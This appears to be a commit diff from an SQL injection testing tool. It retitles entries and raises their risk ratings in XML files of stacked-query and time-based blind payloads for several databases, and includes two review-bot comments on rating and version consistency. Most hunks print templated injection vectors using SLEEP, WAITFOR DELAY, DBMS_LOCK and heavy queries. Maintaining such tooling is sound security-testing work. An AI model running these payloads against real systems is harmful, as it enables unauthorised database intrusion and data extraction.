Commit 3b3205c

Minor stacked queries and time-based payloads cleanup - issue #1169
1 parent 79d4d97 commit 3b3205c

2 files changed

Lines changed: 30 additions & 29 deletions


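--- a/xml/payloads/04_stacked_queries.xml
+++ b/xml/payloads/04_stacked_queries.xml
@@ -6,7 +6,7 @@
 <title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title>
 <stype>4</stype>
 <level>2</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>0</clause>
 <where>1</where>
 <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
@@ -26,7 +26,7 @@
 <title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
 <stype>4</stype>
 <level>4</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>0</clause>
 <where>1</where>
 <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
@@ -47,7 +47,7 @@
 <title>MySQL &gt; 5.0.11 stacked queries</title>
 <stype>4</stype>
 <level>1</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>0</clause>
 <where>1</where>
 <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
@@ -88,7 +88,7 @@
 <title>PostgreSQL &gt; 8.1 stacked queries</title>
 <stype>4</stype>
 <level>1</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>0</clause>
 <where>1</where>
 <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
@@ -129,7 +129,7 @@
 <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
 <stype>4</stype>
 <level>4</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>0</clause>
 <where>1</where>
 <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
@@ -151,7 +151,7 @@
 <title>Microsoft SQL Server/Sybase stacked queries</title>
 <stype>4</stype>
 <level>1</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>0</clause>
 <where>1</where>
 <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
@@ -173,7 +173,7 @@
 <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
 <stype>4</stype>
 <level>5</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>0</clause>
 <where>1</where>
 <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
@@ -213,7 +213,7 @@
 <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
 <stype>4</stype>
 <level>5</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>0</clause>
 <where>1</where>
 <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
@@ -233,7 +233,7 @@
 <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
 <stype>4</stype>
 <level>5</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>0</clause>
 <where>1</where>
 <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
@@ -295,7 +295,7 @@
 <title>HSQLDB &gt;= 1.7.2 stacked queries</title>
 <stype>4</stype>
 <level>3</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>0</clause>
 <where>1</where>
 <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
@@ -316,7 +316,7 @@
 <title>HSQLDB &gt;= 2.0 stacked queries</title>
 <stype>4</stype>
 <level>4</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>0</clause>
 <where>1</where>
 <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>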
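Review bot: The two HSQLDB entries in the `@@ -295` and `@@ -316` hunks are raised to `<risk>1</risk>` together with the SLEEP-based payloads, yet their vectors rely on `REPEAT(...,[SLEEPTIME]00000000)` rather than a sleep primitive, which is the heavy-query pattern that 05_time_blind.xml in this same commit rates `<risk>2</risk>`. If the risk field is meant to reflect the load a test places on the target DBMS, these two appear under-rated relative to the rest of the change; either use `<risk>2</risk>` for them or add a comment above each stating why a stacked heavy query is rated lower than the non-stacked one. Each `<test>` element touched here opens and closes outside the visible hunk lines.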

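--- a/xml/payloads/05_time_blind.xml
+++ b/xml/payloads/05_time_blind.xml
@@ -207,7 +207,7 @@
 <title>Microsoft SQL Server/Sybase time-based blind</title>
 <stype>5</stype>
 <level>1</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>0</clause>
 <where>1</where>
 <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
@@ -931,12 +931,13 @@
 <!-- TODO: if possible, add payload for Microsoft Access -->
 <!-- End of OR time-based blind tests -->
 
-<!-- Time-based tests - After ORDER BY...LIMIT... -->
+<!-- Time-based tests - LIMIT clause -->
+<!-- This payload does not work with SLEEP() -->
 <test>
-<title>MySQL &gt;= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
+<title>MySQL &gt;= 5.1 heavy-query time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
 <stype>5</stype>
 <level>3</level>
-<risk>1</risk>
+<risk>2</risk>
 <clause>1,2,3,4,5</clause>
 <where>1</where>
 <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
@@ -951,7 +952,7 @@
 <dbms_version>&gt; 5.0.11</dbms_version>
 </details>
 </test>
-<!-- Time-based tests - After ORDER BY...LIMIT... -->
+<!-- Time-based tests - LIMIT clause -->
 
 <!-- Time-based blind tests - Parameter replace -->
 <test>
@@ -1177,7 +1178,7 @@
 <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
 <stype>5</stype>
 <level>3</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>1,3</clause>
 <where>3</where>
 <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
@@ -1351,9 +1352,9 @@
 <!-- End of time-based blind tests - Parameter replace -->
 
 
-<!-- Time-based blind tests - GROUP BY and ORDER BY clauses -->
+<!-- Time-based blind tests - GROUP BY and ORDER BY clause -->
 <test>
-<title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
+<title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clause</title>
 <stype>5</stype>
 <level>3</level>
 <risk>1</risk>
@@ -1373,7 +1374,7 @@
 </test>
 
 <test>
-<title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+<title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
 <stype>5</stype>
 <level>4</level>
 <risk>2</risk>
@@ -1392,7 +1393,7 @@
 </test>
 
 <test>
-<title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clauses</title>
+<title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clause</title>
 <stype>5</stype>
 <level>3</level>
 <risk>1</risk>
@@ -1412,7 +1413,7 @@
 </test>
 
 <test>
-<title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+<title>PostgreSQL time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
 <stype>5</stype>
 <level>4</level>
 <risk>2</risk>
@@ -1431,7 +1432,7 @@
 </test>
 
 <test>
-<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title>
+<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause</title>
 <stype>5</stype>
 <level>3</level>
 <risk>1</risk>
@@ -1473,10 +1474,10 @@
 </test>
 
 <test>
-<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)</title>
+<title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_LOCK.SLEEP)</title>
 <stype>5</stype>
 <level>3</level>
-<risk>0</risk>
+<risk>1</risk>
 <clause>2,3</clause>
 <where>1</where>
 <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
@@ -1492,7 +1493,7 @@
 </test>
 
 <test>
-<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)</title>
+<title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
 <stype>5</stype>
 <level>3</level>
 <risk>1</risk>
@@ -1511,7 +1512,7 @@
 </test>
 
 <test>
-<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+<title>Oracle time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
 <stype>5</stype>
 <level>4</level>
 <risk>2</risk>
@@ -1530,7 +1531,7 @@
 </test>
 
 <test>
-<title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+<title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
 <stype>5</stype>
 <level>4</level>
 <risk>2</risk>
@@ -1551,7 +1552,7 @@
 </test>
 
 <test>
-<title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+<title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
 <stype>5</stype>
 <level>4</level>
 <risk>2</risk>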
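Review bot: The retitled test in the `@@ -931` hunk still says `MySQL &gt;= 5.1` while the `<dbms_version>&gt; 5.0.11</dbms_version>` of the same `<test>` in the `@@ -951` hunk states a different minimum version, so the title and the details element disagree; pick one bound and use it in both places. The renamed section marker is also reused verbatim as the closing comment at new line 955, unlike the `<!-- End of ... -->` form this file uses elsewhere (new lines 932 and 1352), so `<!-- End of time-based tests - LIMIT clause -->` would keep the open and close markers distinguishable. The `<test>` whose title changes spans both hunks, and its `<details>` body lies outside the visible lines.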
